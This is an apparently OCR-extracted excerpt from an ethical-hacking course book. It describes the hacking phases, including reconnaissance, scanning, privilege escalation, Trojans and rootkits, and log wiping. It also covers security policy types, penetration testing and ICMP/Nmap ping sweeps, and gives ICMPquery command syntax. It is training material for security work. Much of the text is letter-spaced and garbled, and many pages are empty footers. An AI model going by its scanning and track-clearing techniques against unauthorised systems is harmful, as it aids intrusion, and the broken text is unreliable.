n d is a b le t o a cce ss it, h e o r s h e ca n o b t a in u s e fu l in f o r m a t io n s u c h as t h e m a p p in g o f d o m a in n a m e s t o IP a d d re s s e s , m a il s e rv e rs , a n d h o s t in f o r m a t io n r e c o r d s . It is im p ortantthatacompanyhas a p p r o p r ia t e p o lic ie s t o p r o t e c t its in f o r m a t io n a s se ts, a n d a ls o p r o v id e g u id e lin e s t o its u s e rs o f t h e s a m e . B u ild in g u s e r a w a re n e s s o f t h e p r e c a u tio n s t h e y m u s t ta k e in o r d e r t o p r o t e c t t h e ir Mail:mtahirzahid@yahoo.com
Page 225
Power Of Hacking in f o r m a t io n a s s e ts is a c ritic a l f a c t o r in th is c o n te x t. ReconnaissanceTypes ־־״־^׳R e c o n n a is s a n c e te c h n iq u e s c a n b e c a te g o r iz e d b r o a d ly in t o a c tiv e a n d p a s s iv e r e c o n n a is s a n c e . W h e n a n a t t a c k e r a p p r o a c h e s t h e a t ta c k u s in g p a s s iv e r e c o n n a is s a n c e te c h n iq u e s , h e o r s h e d o e s n o t in t e r a c t w it h t h e s y s te m d ir e c tly . T h e a t t a c k e r u se s p u b lic ly a v a ila b le in f o r m a t io n , s o c ia l e n g in e e r in g , a n d d u m p s t e r d iv in g as a m e a n s o f g a t h e r in g in f o r m a t io n . W h e n a n a t t a c k e r e m p lo y s a c tiv e r e c o n n a is s a n c e te c h n iq u e s , h e o r sh e t r ie s t o in t e r a c t w it h t h e s y s te m b y u s in g t o o ls t o d e t e c t o p e n p o rts , a c c e s s ib le h o s ts , r o u t e r lo c a tio n s , n e t w o r k m a p p in g , d e ta ils o f o p e r a t in g s y s te m s , a n d a p p lic a tio n s . T h e n e x t p h a s e o f a t t a c k in g is s c a n n in g , w h ic h is d is c u s s e d in t h e f o llo w in g s e c tio n . S o m e e x p e r ts d o n o t d if f e r e n t ia t e s c a n n in g f r o m a c tiv e re c o n n a is s a n c e . H o w e v e r , t h e r e is a s lig h t d if f e r e n c e as s c a n n in g in v o lv e s m o r e in - d e p t h p r o b in g o n t h e p a r t o f t h e a tta c k e r . O fte n r e c o n n a is s a n c e a n d s c a n n in g p h a s e s o v e r la p , a n d it is n o t a lw a y s p o s s ib le t o d e m a r c a t e th e s e p h a s e s as w a t e r t ig h t c o m p a r t m e n t s . A c tiv e r e c o n n a is s a n c e is u s u a lly e m p lo y e d w h e n t h e a t t a c k e r d is c e rn s t h a t t h e r e is a lo w p r o b a b ilit y t h a t th e s e r e c o n n a is s a n c e a c tiv itie s w ill b e d e t e c t e d . N e w b ie s a n d s c r ip t k id d ie s a re o f t e n f o u n d a t t e m p t in g th is t o g e t fa s te r, v is ib le re s u lts , a n d s o m e t im e s ju s t f o r t h e b ra g v a lu e t h e y ca n o b ta in . Mail:mtahirzahid@yahoo.com
Page 226
Power Of Hacking A s a n e th ic a l h a c k e r, y o u m u s t b e a b le t o d is tin g u is h a m o n g t h e v a r io u s re c o n n a is s a n c e m e t h o d s , a n d b e a b le t o a d v o c a te p r e v e n t iv e m e a s u r e s in t h e lig h t o f p o t e n t ia l t h r e a ts . C o m p a n ie s , f o r t h e ir p a rt, m u s t a d d re s s s e c u r ity as a n in te g r a l p a r t o f t h e ir b u s in e s s a n d / o r o p e r a t io n a l s tr a te g y , a n d b e e q u ip p e d w it h p r o p e r p o lic ie s a n d p r o cedurestocheckforsuch a c tiv itie s . HackingPhases(Contâ&#x20AC;&#x2DC;d) Scanning S c a n n in g is w h a t a n a t t a c k e r d o e s p r io r t o a t t a c k in g t h e n e t w o r k . In s c a n n in g , t h e a t t a c k e r u se s t h e d e ta ils g a t h e r e d d u r in g r e c o n n a is s a n c e t o id e n t if y s p e c ific v u ln e r a b ilitie s . S c a n n in g ca n b e c o n s id e r e d a lo g ic a l e x te n s io n (a n d o v e r la p ) o f t h e a c tiv e r e c o n n a is s a n c e . O fte n a tta c k e r s u se a u t o m a t e d t o o ls s u c h as n e t w o r k / h o s t s c a n n e r s a n d w a r d ia le rs t o lo c a te s y s te m s a n d a t t e m p t t o d is c o v e r v u ln e r a b ilitie s . A n a t t a c k e r c a n g a t h e r c ritic a l n e t w o r k in f o r m a t io n s u c h as t h e m a p p in g o f s y s te m s , r o u te r s , a n d fir e w a lls b y u s in g s im p le t o o ls s u c h as T r a c e r o u t e . A lt e r n a tiv e ly , t h e y c a n u se t o o ls s u c h as C h e o p s t o a d d s w e e p in g f u n c t io n a lit y a lo n g w it h w h a t T r a c e r o u t e r e n d e rs . P o rt s c a n n e rs c a n b e u s e d t o d e t e c t lis te n in g p o r ts t o f in d in f o r m a t io naboutthenatureof s e rv ic e s r u n n in g o n t h e t a r g e t m a c h in e . T h e p r im a r y d e fe n s e t e c h n iq u e in th is re g a r d is t o s h u t d o w n s e rv ic e s t h a t a re n o t r e q u ir e d . A p p r o p r ia t e f ilt e r in g m a y a ls o b e a d o p t e d as a d e fe n s e Mail:mtahirzahid@yahoo.com
Page 227
Power Of Hacking m e c h a n is m . H o w e v e r , a tta c k e r s c a n s till u se t o o ls t o d e t e r m in e t h e r u le s im p le m e n t e d f o r filte r in g . T h e m o s t c o m m o n ly u s e d to o ls a re v u ln e r a b ilit y s c a n n e rs t h a t c a n s e a rc h f o r s e v e ra l k n o w n v u ln e r a b ilit ie s o n a t a r g e t n e t w o r k , a n d c a n p o t e n t ia lly d e t e c t th o u s a n d s o f v u ln e r a b ilitie s . T h is g iv e s t h e a t t a c k e r t h e a d v a n ta g e o f t im e b e c a u s e h e o r s h e o n ly h a s t o f in d a s in g le m e a n s o f e n t r y w h ile t h e s y s te m s p ro fe s s io n a l h a s t o s e c u re m a n y v u ln e r a b le a re a s b y a p p ly in g p a tc h e s . O r g a n iz a tio n s t h a t d e p lo y in t r u s io n d e t e c t io n s y s te m s (ID S e s ) s till h a v e re a s o n t o w o r r y b e c a u s e a tta c k e r s c a n u se e v a s io n t e c h n iq u e s a t b o t h t h e a p p lic a tio n a n d n e t w o r k le v e ls . GainingAccess I e| G a in in g a cc e s s is t h e m o s t im p o r t a n t p h a s e o f a n a tta c k in t e r m s o f p o t e n t ia l d a m a g e . G a in in g a cc e s s r e fe r s t o t h e p o in t w h e r e t h e a t t a c k e r o b ta in s a cc e ss t o t h e o p e r a t in g s y s te m o r a p p lic a tio n s o n t h e c o m p u t e r o r n e t w o r k . T h e a t t a c k e r c a n g a in a c c e s s a t t h e o p e r a t in g s y s te m le v e l, a p p lic a tio n le v e l, o r n e t w o r k le v e l. F a c to rs t h a t in flu e n c e t h e c hancesofanattacker g a in in g a c ce s s in t o a t a r g e t s y s te m in c lu d e t h e a r c h it e c t u r e a n d c o n f ig u r a t io n o f t h e t a r g e t s y s te m , t h e skill le v e l o f t h e p e r p e t r a t o r , a n d t h e in itia l le v e l o f a cc e s s o b t a in e d . T h e a tta c k e r in itia lly t r ie s t o g a in m in im a l a cc e ss t o t h e t a r g e t s y s te m o r n e t w o r k . O n c e h e o r s h e g a in s t h e a cce ss, h e o r s h e tr ie s t o e s c a la te p riv ile g e s t o o b t a in c o m p le t e c o n t r o l o f t h e s y s te m . In t h e
Mail:mtahirzahid@yahoo.com
Page 228
Power Of Hacking p ro c e s s , in t e r m e d ia t e s y s te m s t h a t a re c o n n e c t e d t o it a re a ls o c o m p r o m is e d . A tta c k e r s n e e d n o t a lw a y s g a in a c ce s s t o t h e s y s te m t o c a u s e d a m a g e . F o r in s ta n c e , d e n ia l- o fs e rv ic e a tta c k s c a n e it h e r e x h a u s t r e s o u r c e s o r s to p s e rv ic e s f r o m r u n n in g o n t h e t a r g e t s y s te m . S to p p in g o f s e rv ic e c a n b e c a rr ie d o u t b y k illin g p ro c e s s e s , u s in g a l o g ic / t im e b o m b , o r e v e n r e c o n f ig u r in g a n d c ra s h in g t h e s y s te m . R e s o u rc e s c a n b e e x h a u s te d lo c a lly b y fillin g u p o u t g o in g c o m m u n ic a t io n lin k s . T h e e x p lo it c a n o c c u r lo c a lly , o fflin e , o v e r a L A N o r t h e I n t e r n e t as a d e c e p t io n o r t h e f t . E x a m p le s in c lu d e s ta c k -b a s e d b u f f e r o v e r f lo w s , d e n ia l- o f- s e r v ic e , a n d s e s s io n h ija c k in g . A tta c k e r s u se a t e c h n iq u e c a lle d s p o o fin g t o e x p lo it t h e s y s te m b y p r e t e n d in g t o b e s tr a n g e r s o r d if f e r e n t s y s te m s . T h e y c a n u s e th is t e c h n iq u e t o s e n d a m a lf o r m e d p a c k e t c o n t a in in g a b u g t o t h e t a r g e t s y s te m in o r d e r t o e x p lo it v u ln e r a b ilit y . P a c k e t f lo o d in g m a y b e u s e d t o r e m o t e ly s to p a v a ila b ility o f t h e e s s e n tia l s e rv ic e s . S m u r f a t ta c k s t r y t o e lic it a responsefromthe a v a ila b le u s e rs o n a n e t w o r k a n d t h e n u se t h e ir le g it im a t e a d d re s s t o f lo o d t h e v ic tim . MaintainingAccess O n c e a n a t t a c k e r g a in s a cce ss t o t h e t a r g e t s y s te m , t h e a t t a c k e r c anchoosetouse b o t h t h e s y s te m a n d its r e s o u r c e s a n d f u r t h e r u s e t h e s y s te m as a la u n c h p a d t o sc a n a n d e x p lo it o t h e r s y s te m s , o r t o k e e p a lo w p r o file a n d c o n t in u e e x p lo it in g t h e s y s te m . B o th th e s e
Mail:mtahirzahid@yahoo.com
Page 229
Power Of Hacking a c tio n s c a n d a m a g e t h e o rg a n iz a tio n . F o r in s ta n c e , t h e a t t a c k e r c a n im p le m e n t a s n iffe r t o c a p t u r e all n e t w o r k t r a ffic , in c lu d in g t e ln e t a n d f t p s e s s io n s w it h o t h e r s y s te m s . A tta c k e r s , w h o c h o o s e t o r e m a in u n d e t e c t e d , r e m o v e e v id e n c e o f t h e ir e n t r y a n d u s e a b a c k d o o r o r a T ro ja n t o g a in r e p e a t a c ce ss. T h e y c a n a ls o in s ta ll r o o t k it s a t t h e k e rn e l le v e l t o g a in s u p e r u s e r a cce ss. T h e re a s o n b e h in d th is is t h a t r o o t k it s g a in a cc e s s a t t h e o p e r a t in g s y s te m le v e l w h ile a T r o ja n h o r s e g a in s a cc e ss a t t h e a p p lic a tio n le v e l. B o th r o o t k it s a n d T ro ja n s d e p e n d o n u s e rs t o in s ta ll t h e m . W it h in W in d o w s s y s te m s , m o s t T ro ja n s in s ta ll th e m s e lv e s as a s e rv ic e a n d ru n as lo c a l s y s te m , w h ic h h a s a d m in is t r a t iv e a cce ss. A t ta c k e r s c a n u se T r o ja n h o rs e s t o t r a n s f e r u s e r n a m e s , p a s s w o r d s , a n d e v e n c r e d it c a rd in f o r m a t io n s to r e d o n t h e s y s te m . T h e y c a n m a in t a in c o n t r o l o v e r t h e ir s y s te m f o r a lo n g t im e b y " h a r d e n in g " t h e s y s te m a g a in s t o t h e r a tta c k e r s , a n d s o m e tim e s , in t h e p ro c e s s , d o r e n d e r s o m e d e g r e e o f p r o t e c t io n t o t h e s y s te m f r o m o t h e r a tta c k s . T h e y c a n t h e n u se t h e ir a c ce s s t o s te a l d a ta , c o n s u m e CPU cy c le s , a n d t r a d e s e n s itiv e in f o r m a t io n o r e v e n r e s o r t t o e x t o r t io n . O r g a n iz a tio n s c a n u s e in t r u s io n d e t e c t io n s y s te m s o r d e p lo y h o n e y p o t s a n d h o n e y n e t s t o d e t e c t in tr u d e r s . T h e la t t e r t h o u g h is n o t r e c o m m e n d e d u n le s s t h e o r g a n iz a tio n h a s t h e r e q u ir e d s e c u r ity p ro fe s s io n a l t o le v e ra g e t h e c o n c e p t f o r p r o t e c t io n . ClearingTracks A n a t t a c k e r w o u ld lik e t o d e s t r o y e v id e n c e o f h is o r h e r p re s e n c e a n d a c tiv itie s f o r Mail:mtahirzahid@yahoo.com
Page 230
Power Of Hacking v a r io u s re a s o n s s u c h as m a in t a in in g a c c e s s a n d e v a d in g p u n it iv e a c tio n . T r o ja n s s u c h as ps o r n e t c a t c o m e in h a n d y f o r a n y a t t a c k e r w h o w a n t s t o d e s t r o y t h e e v id e n c e f r o m t h e lo g file s o r r e p la c e t h e s y s te m b in a rie s w it h t h e s a m e . O n c e t h e T r o ja n s a re in p la c e , t h e a t t a c k e r c a n b e a s s u m e d t o h a v e g a in e d t o t a l c o n t r o l o f t h e s y s te m . R o o tk its a re a u t o m a t e d t o o ls t h a t a re d e s ig n e d t o h id e t h e p re s e n c e o f t h e a tta c k e r . B y e x e c u tin g t h e s c rip t, a v a r ie t y o f c ritic a l file s a re r e p la c e d w it h T r o ja n n e d v e rs io n s , h id in g t h e a t t a c k e r in s e c o n d s. O t h e r t e c h n iq u e s in c lu d e s te g a n o g r a p h y a n d t u n n e lin g . S t e g a n o g r a p h y is t h e p ro c e s s o f h id in g t h e d a ta , f o r in s ta n c e in im a g e s a n d s o u n d file s . T u n n e lin g ta k e s a d v a n ta g e o f t h e t r a n s m is s io n p r o t o c o l b y c a r r y in g o n e p r o t o c o l o v e r a n o th e r . E ve n t h e e x tra s p a c e (e.g ., u n u s e d b its ) in t h e TCP a n d IP h e a d e r s c a n b e u s e d f o r h id in g in f o r m a t io n . A n a t t a c k e r ca n u s e t h e s y s te m as a c o v e r t o la u n c h fr e s h a tta c k s a g a in s t o t h e r s y s te m s o r u s e it as a m e a n s o f r e a c h in g a n o t h e r s y s te m o n t h e n e t w o r k w i t h o u t b e in g d e t e c t e d . T h u s , th is p h a s e o f a tta c k c a n t u r n in t o a n e w c y c le o f a t t a c k b y u s in g r e c o n n a is s a n c e te c h n iq u e s all o v e r a g a in . T h e r e h a v e b e e n in s ta n c e s w h e r e a n a t t a c k e r h a s lu r k e d o n a s y s te m e v e n as s y s te m a d m in is t r a t o r s h a v e c h a n g e d . T h e s y s te m a d m in is t r a t io n c a n d e p lo y h o s t - b a s e d ID S e s a n d a n ti- v ir u s t o o ls t h a t c a n d e t e c t T ro ja n s a n d o t h e r s e e m in g ly b e n ig n file s a n d d ir e c to r ie s . A s a n e th ic a l h a c k e r, y o u m u s t b e a w a r e o f t h e t o o ls a n d te c h n iq u e s t h a t a tta c k e r s d e p lo y , s o t h a t y o u a re a b le t o a d v o c a te a n d ta k e c o u n t e r m e a s u r e s t o e n s u re p r o t e c t io n . T h e s e w ill b e Mail:mtahirzahid@yahoo.com
Page 231
Power Of Hacking d e ta ile d in s u b s e q u e n t m o d u le s . TypesofAttacksonaSystem T h e r e a re s e v e ra l w a y s a n a t t a c k e r c a n g a in a cc e ss t o a s y s te m . T h eattackermustbe a b le t o e x p lo it a w e a k n e s s o r v u ln e r a b ilit y in a s y s te m : Š O p e r a t in g s y s t e m a tta c k s : A tta c k e r s s e a rc h f o r O S v u ln e r a b ilit ie s a n d e x p lo it t h e m t o g a in a cc e ss t o a n e t w o r k s y s te m . Q A p p lic a t io n - le v e l a tta c k s : S o f t w a r e a p p lic a tio n s c o m e w it h m y r ia d f u n c t io n a lit ie s a n d fe a tu r e s . T h e r e is a d e a r t h o f t im e t o p e r f o r m c o m p le t e te s tin g b e fo r e r e le a s in g p r o d u c ts . T h o s e a p p lic a tio n s h a v e v a r io u s v u ln e r a b ilit ie s a n d b e c o m e a s o u rc e o f a tta c k . 0 M is c o n f ig u r a t io n a tta c k s : M o s t a d m in is t r a t o r s d o n 't h a v e t h e n e c e s s a ry sk ills t o m a in t a in o r fix issu e s, w h ic h m a y le a d t o c o n f ig u r a t io n e r r o r s . S u c h c o n f ig u r a t io n e r r o r s m a y b e c o m e t h e s o u rc e s f o r a n a t t a c k e r t o e n t e r in t o t h e t a r g e t 's n e t w o r k o r s y s te m . Q S h r in k w r a p c o d e a tta c k s : O p e r a tin g s y s te m a p p lic a tio n s c o m e w it h n u m e r o u s s a m p le s c r ip ts t o m a k e t h e jo b o f a d m in is t r a t o r e a sy , b u t t h e s a m e s c r ip ts h a v e v a r io u s v u ln e r a b ilitie s , w h ic h c a n le a d t o s h r in k w r a p c o d e a tta c k s .
Mail:mtahirzahid@yahoo.com
Page 232
Power Of Hacking
Misconfi gurationAttacks M is c o n f ig u r a t io n v u ln e r a b ilit ie s a ff e c t w e b s e rv e r s , a p p lic a t io n p la t f o r m s , d a ta b a s e s , n e t w o r k s , o r f r a m e w o r k s t h a t m a y r e s u lt in ille g a l a c c e s s o r p o s s ib le o w n in g o f t h e s y s te m . If a s y s te m is m is c o n fig u r e d , s u c h as w h e n a c h a n g e is m a d e in t h e file p e r m is s io n , it c a n n o lo n g e r b e c o n s id e r e d s e c u re . A d m in is t r a t o r s a re e x p e c te d t o c h a n g e t h e c o n f ig u r a t io n o f t h e d e v ic e s b e f o r e t h e y a re d e p lo y e d in t h e n e t w o r k . F a ilu re t o d o th is a llo w s t h e d e f a u lt s e ttin g s t o b e u s e d t o a t ta c k t h e s y s te m . In o r d e r t o o p t im iz e t h e c o n f ig u r a t io n o f t h e m a c h in e , r e m o v e a n y r e d u n d a n t s e rv ic e s o r s o f t w a r e .
Mail:mtahirzahid@yahoo.com
Page 233
Power Of Hacking
Applicat ion-levelAttacks A p p lic a t io n s a re b e in g re le a s e d w it h m o r e f e a t u r e s a n d m o r e c o m p le x c o d in g . W it h th is in c re a s e d d e m a n d in f u n c t io n a lit y a n d fe a tu r e s , d e v e lo p e r s g e n e r a lly o v e r lo o k t h e s e c u r ity o f t h e a p p lic a tio n , w h ic h g iv e s ris e t o v u ln e r a b ilit ie s in a p p lic a tio n s . A t ta c k e r s f in d a n d e x p lo it th e s e v u ln e r a b ilit ie s in t h e a p p lic a tio n s u s in g d if f e r e n t t o o ls a n d t e c h n iq u e s . T h e a p p lic a tio n s a re v u ln e r a b le t o a tta c k b e c a u s e o f t h e f o llo w in g re a s o n s : 0 S o f t w a r e d e v e lo p e r s h a v e t ig h t s c h e d u le s t o d e liv e r p r o d u c ts o n t im e 0 S o f t w a r e a p p lic a tio n s c o m e w it h a m u l t i t u d e o f f e a t u r e s a n d f u n c t io n a lit ie s 0 T h e r e is a d e a r t h o f t i m e t o p e r f o r m c o m p le t e t e s t in g b e f o r e r e le a s in g p r o d u c ts 0 S e c u r ity is o f t e n a n a f t e r t h o u g h t , a n d f r e q u e n t ly d e liv e r e d as a n "add-on"component Mail:mtahirzahid@yahoo.com
Page 234
Power Of Hacking P o o r o r n o n e x is te n t e r r o r c h e c k in g in a p p lic a tio n s le a d s to : 0 B u ffe r o v e r f lo w a tta c k s 0 A c tiv e c o n t e n t 0 C ro s s -s ite s c r ip tin g 0 D e n ia l- o f- s e rv ic e a n d SYN a tta c k s SQ L in je c t io n a tta c k s Q M a lic io u s b o ts O t h e r a p p lic a t io n - le v e l a t t a c k s in c lu d e : Q P h is h in g Š S e s s io n h ija c k in g e M a n - in - t h e - m id d le a tta c k s e P a r a m e t e r / f o r m t a m p e r in g 0 D ir e c t o r y tr a v e r s a l a tta c k s
Mail:mtahirzahid@yahoo.com
Page 235
Power Of Hacking
xample sofApplication-LevelAttacks SessionHijacking A tta c k e r s m a y e x p lo it s e s s io n in f o r m a t io n in t h e v u ln e r a b le c o d e t o p e r f o r m s e s s io n h ija c k in g w h e n y o u e n a b le c o o k ie le s s a u t h e n t ic a t io n in y o u r a p p lic a tio n . W h e n t h e t a r g e t tr ie s t o b r o w s e t h r o u g h a URL, t h e s e s s io n o r a u t h e n t ic a t io n t o k e n a p p e a r s in t h e r e q u e s t U R L in s te a d o f t h e s e c u re c o o k ie , t o g iv e a cce ss t o t h e U R L r e q u e s t e d b y t h e t a r g e t. H e re , a n a t t a c k e r u s in g h is o r h e r s kills a n d m o n it o r in g t o o ls c a n h ija c k t h e ta r g e ts s e s s io n a n d s te a l all s e n s itiv e in f o r m a t io n . V u ln e r a b le C o d e A tta c k e r s m a y e x p lo it s e s s io n in f o r m a t io n in t h e v u ln e r a b le c o d e t o p e r f o r m s e s s io n h ija c k in g .
Mail:mtahirzahid@yahoo.com
Page 236
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 237
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 238
Power Of Hacking
Skillsof anEthicalHacker Ethical hacking is the legal hacking performed by pen tester to find vulnerabilities in the information technology environment. In order to perform ethical hacking, the ethical hacker requires the skills of a computer expert. Ethical hackers should also have strong computer knowledge including programming and networking. They should be proficient at installing and maintaining systems using popular operating systems (e.g. UNIX, Windows, or Linux). Detailed knowledge of hardware and software provided by popular computer and networking hardware vendors complement this basic knowledge. It is not always necessary that ethical hackers possess any additional specialization in security. However, it is an advantage to know how various systems maintain their security. Management skills pertaining to these systems are necessary for actual vulnerability testing and for preparing the report after the testing is carried out. Mail:mtahirzahid@yahoo.com
Page 239
Power Of Hacking An ethical hacker should possess immense patience as the analysis stage consumes more time than the testing stage. The tim e frame for an evaluation may vary from a few days to several weeks, depending on the nature of the task. When an ethical hacker encounters a system with which he or she is not familiar, it is imperative the person takes the time to learn everything about the system and try to find its vulnerable spots.
Classifi c a t i o n o f S e c u r it y P o l ic ie s Security policies are sets of policies that are developed to protect or safeguard a company's information assets, networks, etc. These policies are applicable to users, IT departments, organization, and so on. For effective security management, security policies are classified into five different areas: Iâ&#x20AC;&#x201D;U s e r P o lic y Mail:mtahirzahid@yahoo.com
Page 240
Power Of Hacking 0 Defines what kind of user is using the network 0 Defines the limitations that are applied on users to secure the network 0 Ex: Password Management Policy I T P o lic y Designed for an IT department to keep the network secure and stable Ex: backup policies, server configuration, patch updates, modification policies, firewall policies G e n e r a l P o lic ie s ^ Define the responsibility for general business purposes Ex: high-level program policy, business continuity plans, crisis management, disaster recovery P a r tn e r P o lic y Policy that is defined among a group of partners ^ Is s u e - s p e c ific P o lic ie s x Recognize specific areas of concern and describe the organization's status for toplevel management Ex: physical security policy, personnel security policy, communications security
Mail:mtahirzahid@yahoo.com
Page 241
Power Of Hacking
Typesof S e c u r it y P o l ic ie s A security policy is a document that contains information on the way the company plans to protect its information assets from known and unknown threats. These policies help to maintain the confidentially, availability, and integrity of information. The four major types of security policies are as follows: P r o m is c u o u s P o lic y A m rk With a promiscuous policy, there is no restriction on Internet access. A user can access any site, download any application, and access a computer or a network from a remote location. While this can be useful in corporate businesses where people who travel or work at branch offices need to access the organizational networks, many malware, virus, and Trojan Mail:mtahirzahid@yahoo.com
Page 242
Power Of Hacking threats are present on the Internet. Due to free Internet access, this malware can come as attachments without the knowledge of the user. Network administrators must be extremely alert if this type of policy is chosen. P e r m is s iv e P o lic y i!L 1 • ׳In a permissive policy, the majority of Internet traffic is accepted, but several known dangerous services and attacks are blocked. Because only known attacks and exploits are blocked, it is impossible for administrators to keep up with current exploits. Administrators are always playing catch-up with new attacks and exploits. P r u d e n t P o lic y A prudent policy starts with all services blocked. The administrator enables safe and necessary services individually. This provides maximum security. Everything, such as system and network activities, is logged. P a r a n o id P o lic y In a paranoid policy, everything is forbidden. There is strict restriction on all usage of company computers, whether it is system usage or network usage. There is either no Internet connection or severely limited Internet usage. Due to these overly severe restrictions, users
Mail:mtahirzahid@yahoo.com
Page 243
Power Of Hacking often try to find ways around them.
WhatIs P e n e t r a t io n T e s t in g ? Penetration testing is a method of evaluating security levels of a particular system or Mail:mtahirzahid@yahoo.com
Page 244
Power Of Hacking network. This helps you determine the flaws related to hardware and software. The early identification helps protect the network. If the vulnerabilities aren't identified early, then they become an easy source for the attacker for the intrusion. During penetration testing, a pen tester analyzes all the security measures employed by the organization for design weaknesses, technical flaws, and vulnerabilities. There are two types of testing; black box testing and whitebox testing. Black box testing simulates an attack from someone who is unfamiliar with the system, and white box testing simulates an attacker that has knowledge about the system. Once all the tests are conducted, the pen tester prepares a report and includes all the test results and the tests conducted along with the vulnerabilities found and the respective countermeasures that can be applied. Finally, the pen tester delivers the report to executive, management, and technical audiences. W h y P e n e t r a t io n T e s t in g ? Penetration testing is required because it helps you to: © Identify the threats facing an organization's information assets © Reduce an organization's IT security costs and provide a better Return On Security Investment (ROSI) by identifying and resolving vulnerabilities and weaknesses © Provide an organization with assurance: a thorough and comprehensive assessment of organizational security covering policy, procedure, design, and implementation © Gain and maintain certification to an industry regulation (BS7799, HIPAA etc.) © Adopt best practices by conforming to legal and industry regulations © Test and validate the efficiency of security protections and controls © Change or upgrade existing infrastructure of software, hardware, or network design Mail:mtahirzahid@yahoo.com
Page 245
Power Of Hacking Š Focus on high-severity vulnerabilities and emphasize application-level security issues to development teams and management Š Provide a comprehensive approach of preparation steps that can be taken to prevent upcoming exploitation Š Evaluate the efficiency of network security devices such as firewalls, routers, and web servers
Mail:mtahirzahid@yahoo.com
Page 246
Power Of Hacking
C h e c k in g f o r L iv e S y s t e m s g ni n n a c S P M C I־ ICMP Scanning Mail:mtahirzahid@yahoo.com
Page 247
Power Of Hacking All required information about a system can be gathered by sending ICMP packets to it. Since ICMP does not have a port abstraction, this cannot be considered a case of port scanning. However, it is useful to determine which hosts in a network are up by pinging them all (the P option does this; ICMP scanning is now in parallel, so it can be quick). The user can also increase the number of pings in parallel with the -L option. It can also be helpful to tweak the ping timeout value with the -T option. ICMP Query The UNIX tool ICMPquery or ICMPush can be used to request the time on the system (to find out which time zone the system is in) by sending an ICMP type 13 message (TIMESTAMP). The netmask on a particular system can also be determined with ICMP type 17 messages (ADDRESS MARK REQUEST). After finding the netmask of a network card, one can determine all the subnets in use. After gaining information about the subnets, one can target only one particular subnet and avoid hitting the broadcast addresses. ICMPquery has both a timestamp and address mask request option: icmp query <-query-> [-B] [-f fromhost] [-d delay] [-T time] target Where <query> is one of: -t: icmp timestamp request (default) -m: icmp address mask request -d: delay to sleep between packets is in microseconds. -T - specifies the number of seconds to wait for a host to respond. The default is 5.
Mail:mtahirzahid@yahoo.com
Page 248
Power Of Hacking A target is a list of hostnames or addresses.
Ping Scan Output Using Nmap Source: http://nmap.org Nmap is a tool that can be used for ping scans, also known as host discovery. Using this tool you can determine the live hosts on a network. It performs ping scans by sending the ICMP ECHO requests to all the hosts on the network. If the host is live, then the host sends an ICMP ECHO reply. This scan is useful for locating active devices or determining if ICMP is passing through a firewall. The following screenshot shows the sample output of a ping scan using Zenmap, the official cross-platform GUI for the Nmap Security Scanner:
TCP/IP Packet To understand ping, you should be able to understand the TCP/IP packet. When a system pings, a single packet is sent across the network to a specific IP address. This packet contains 64 bytes,
Mail:mtahirzahid@yahoo.com
Page 249
Power Of Hacking i.e., 56 data bytes and 8 bytes of protocol header information. The sender then waits for a return packet from the target system. A good return packet is expected only when the connections are good and when the targeted system is active. Ping also determines the number of hops that lie between the two computers and the round-trip time, i.e., the total time taken by a packet for completing a trip. Ping can also be used for resolving host names. In this case, if the packet bounces back when sent to the IP address, but not when sent to the name, then it is Using Nmap Security Scanner you can perform ping sweep. Ping sweep determines the IP addresses of live hosts. This provides information about the live host IP addresses as well as their MAC address. It allows you to scan multiple hosts at a time and determine active hosts on the network. The following screenshot shows the result of a ping sweep using Zenmap, the an indication that the system is unable to resolve the name to the specific IP address. Source: http://nmap.org official cross-platform GUI for the Nmap Security Scanner:
P in g S w e e p T o o ls Determining live hosts on a target network is the first step in the process of hacking
Mail:mtahirzahid@yahoo.com
Page 250
Power Of Hacking or breaking into a network. This can be done using ping sweep tools. There are a number of ping sweep tools readily available in the market using which you can perform ping sweeps easily. These tools allow you to determine the live hosts by sending ICMP ECHO requests to multiple hosts at a time. Angry IP Scanner and Solarwinds Engineer's Toolset are a few
commonly used ping sweep tools. ryIPScanner
Ang
Source: http://www.angryip.org /j Angry IP Scanner is an IP scanner tool. This tool identifies all non-responsive addresses as dead nodes, and resolves hostname details, and checks for open ports. The main feature of this tool is multiple ports scanning, configuring scanning columns. Its main goal is to find the active hosts in the network by scanning all the IP addresses as well as ports. It runs on Linux, Windows, Mac
Mail:mtahirzahid@yahoo.com
Page 251
Power Of Hacking OS X, etc. It can scan IP addresses ranging from 1.1.1.1 to 255.255.255.255.
SolarwindsEngineerâ&#x20AC;&#x2DC;sToolset Source: http://www.solarwinds.com The Solarwinds Engineer's Toolset is a collection of network engineer's tools. By using this toolset you can scan a range of IP addresses and can identify the IP addresses that are in use currently and the IP addresses that are free. It also performs reverse DNS lookup.
Mail:mtahirzahid@yahoo.com
Page 252
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 253
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 254
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 255
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 256
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 257
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 258
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 259
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 260
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 261
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 262
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 263
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 264
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 265
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 266
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 267
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 268
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 269
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 270
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 271
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 272
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 273
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 274
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 275
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 276
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 277
Power Of Hacking
Mail:mtahirzahid@yahoo.com
Page 278
Power Of Hacking
